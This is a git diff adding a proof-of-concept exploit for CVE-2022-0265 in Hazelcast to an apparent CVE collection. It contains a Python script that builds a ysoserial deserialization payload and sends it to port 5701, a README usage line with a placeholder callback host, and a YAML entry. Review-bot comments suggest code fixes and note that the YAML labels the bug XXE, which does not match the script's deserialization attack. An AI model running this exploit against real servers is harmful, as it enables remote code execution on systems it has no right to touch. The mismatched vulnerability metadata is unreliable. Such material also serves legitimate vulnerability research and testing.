diff --git a/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py b/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py
new file mode 100644
index 0000000000000000000000000000000000000000..a7fac033e38e130e889d4d9a5b84a4e5653a29ed
--- /dev/null
+++ b/cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py
@@ -0,0 +1,32 @@
+import socket
+import threading
+import time
+import sys
+import os
+groupName = b""
+clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+def socketRecv(clientSocket):
+    global groupName
+    while(1):
+        groupName += clientSocket.recv(1024)
+if __name__ == '__main__':
+
+    ip = sys.argv[1]
+    payloadType = sys.argv[2]
+    payload = sys.argv[3]
+
+    os.system(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser")
+    print(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser")
+    clientSocket.connect((ip, 5701))
+    obj1 = threading.Thread(target=socketRecv ,args=(clientSocket,))
+    obj1.start()
+    file = open("1.ser", 'rb')
+    filebyte = file.read()
+    print(filebyte)
+
+    print("输入 send 发送payload")
+    if(input("INPUT:")=="send"):
+        print(groupName)
+        clientSocket.send(groupName+b"\xFF\xFF\xFF\x9C"+filebyte)
+        time.sleep(10)
+        clientSocket.close()
diff --git a/cve/hazelcast/2022/CVE-2022-0265/README.md b/cve/hazelcast/2022/CVE-2022-0265/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..7ebfefe80d605e9cd78b69ff460fa24088ec99a6
--- /dev/null
+++ b/cve/hazelcast/2022/CVE-2022-0265/README.md
@@ -0,0 +1,7 @@
+# CVE-2022-0265
+
+把 ysoserial.jar 放同目录下
+
+**example** python CVE-2022-0265.py 127.0.0.1 URLDNS "http://xxx.log."
+
+![](poc.png)
diff --git a/cve/hazelcast/2022/CVE-2022-0265/poc.png b/cve/hazelcast/2022/CVE-2022-0265/poc.png
new file mode 100644
index 0000000000000000000000000000000000000000..a2412b116446380463c446fd8fa4d37a5ab73d2a
Binary files /dev/null and b/cve/hazelcast/2022/CVE-2022-0265/poc.png differ
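Review bot: `os.system(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser")` passes `sys.argv[2]` and `sys.argv[3]` to a shell unquoted and ignores the exit status, so a payload argument containing shell metacharacters is reinterpreted by the shell, and when `ysoserial.jar` is absent or the gadget name is wrong `1.ser` is created empty and the script still sends `groupName + b"\xFF\xFF\xFF\x9C"` followed by nothing. Run the generator with `subprocess.run([...], stdout=out, check=True)` (this adds `import subprocess`) and open `1.ser` with `with` so the handle is closed. `socketRecv` never leaves its loop when `recv` returns `b""` after the peer closes, which turns the thread into a busy spin, and the main thread reads `groupName` while the receiver is still appending to it, so the prefix that gets sent depends on how long the operator waits before typing `send`; a comment on the `clientSocket.send(...)` line stating what the prefix is expected to hold would help the next reader. The yaml added in the same commit classifies this CVE as XXE (CWE-611), whereas this script delivers a ysoserial deserialization gadget to port 5701 — presumably a different delivery path than the yaml describes — so the README should say which vulnerability the payload actually exercises.
```python
def socketRecv(clientSocket):
    global groupName
    while True:
        chunk = clientSocket.recv(1024)
        if not chunk:  # peer closed: stop instead of spinning on b""
            break
        groupName += chunk

# … unchanged: argv parsing …
    with open("1.ser", "wb") as out:
        subprocess.run(["java", "-jar", "ysoserial.jar", payloadType, payload],
                       stdout=out, check=True)
# … unchanged: connect, receiver thread, prompt, send …
```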
diff --git a/cve/hazelcast/2022/yaml/CVE-2022-0265.yaml b/cve/hazelcast/2022/yaml/CVE-2022-0265.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..d21d742764c86e4e8556dc6e86e0bb28798d25b9
--- /dev/null
+++ b/cve/hazelcast/2022/yaml/CVE-2022-0265.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-0265
+source: https://github.com/achuna33/CVE-2022-0265https://github.com/achuna33/CVE-2022-0265
+info:
+  name: Hazelcast是一个开源的可嵌入式数据网格。Hazelcast使得Java程序员更容易开发分布式计算系统,提供了很多Java接口的分布式实现,如:Map, Queue, Topic, ExecutorService, Lock, 以及 JCache等。
+  severity: critical
+  description: |
+    AbstractXmlConfigRootTagRecognizer()函数使用从SAXParserFactory生成的SAXParser,该SAXParser没有FEATURE_SECURE_PROCESSING集,可能会遭受XXE攻击。
+  scope-of-influence:
+    hazelcast 5.1
+  reference:
+    - https://nvd.nist.gov/vuln/detail/cve-2022-0265
+    - https://github.com/hazelcast/hazelcast/commit/4d6b666cd0291abd618c3b95cdbb51aa4208e748
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-0265
+    cwe-id: CWE-611
+    cnvd-id: None
+    kve-id: None
+  tags: cve, xxe
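Review bot: The `source:` value on the second line is two copies of the same URL run together (`...CVE-2022-0265https://github.com/achuna33/...`), which nothing consuming this file will resolve; it should read `source: https://github.com/achuna33/CVE-2022-0265`. The `description`, `cwe-id: CWE-611` and `tags: cve, xxe` describe an XXE in the XML config parser, while the PoC script added in the same commit sends a ysoserial serialized object to port 5701; if that script is meant as the reproducer for this entry, the description should state how the two relate, otherwise the `xxe` tag misleads anyone filtering on it. `scope-of-influence` lists only `hazelcast 5.1`; it is worth confirming the affected range against the NVD reference cited below it rather than a single release, since the fix commit alone does not establish the range.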